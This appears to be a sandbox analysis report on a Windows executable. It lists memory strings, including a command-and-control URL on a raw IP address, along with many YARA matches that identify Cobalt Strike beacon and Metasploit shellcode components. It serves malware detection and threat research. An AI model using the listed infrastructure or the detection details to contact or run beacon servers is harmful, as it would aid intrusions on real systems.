            Source: k2vUsu5VZ5.exe, 00000000.00000003.2577565149.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif12
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2527967708.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2577565149.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2800732875.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2459856839.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2839564905.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2788807808.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2564353012.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.1974275008.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gifP
            Source: k2vUsu5VZ5.exe, 00000000.00000003.1974275008.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gifl
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2347746904.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2483467740.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000002.4094875365.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gifu
            Source: k2vUsu5VZ5.exe, 00000000.00000002.4094719689.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gify-
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2505423500.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gifz
            Source: k2vUsu5VZ5.exe, 00000000.00000003.1974275008.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2335439729.00000000007DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/r9dN

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03890240 CreateProcessAsUserA,GetLastError,GetLastError,CreateProcessA,GetLastError,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithTokenW,GetLastError,GetLastError,GetLastError,GetLastError,0_2_03890240
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038A03DC0_2_038A03DC
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038A43D40_2_038A43D4
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0388A2800_2_0388A280
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038ABAB00_2_038ABAB0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038902400_2_03890240
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038AA2700_2_038AA270
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038961C00_2_038961C0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038AB1400_2_038AB140
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038AD0C00_2_038AD0C0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0389E0E80_2_0389E0E8
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0388D7840_2_0388D784
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038A0E900_2_038A0E90
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0389EEB40_2_0389EEB4
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038AAE570_2_038AAE57
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0389FD180_2_0389FD18
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03889D6C0_2_03889D6C
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038A95700_2_038A9570
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03896CB00_2_03896CB0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_001601090_2_00160109
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0348CBCB0_2_0348CBCB
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_034A02D70_2_034A02D7
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0349F15F0_2_0349F15F
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0349F8230_2_0349F823
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0349D52F0_2_0349D52F
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
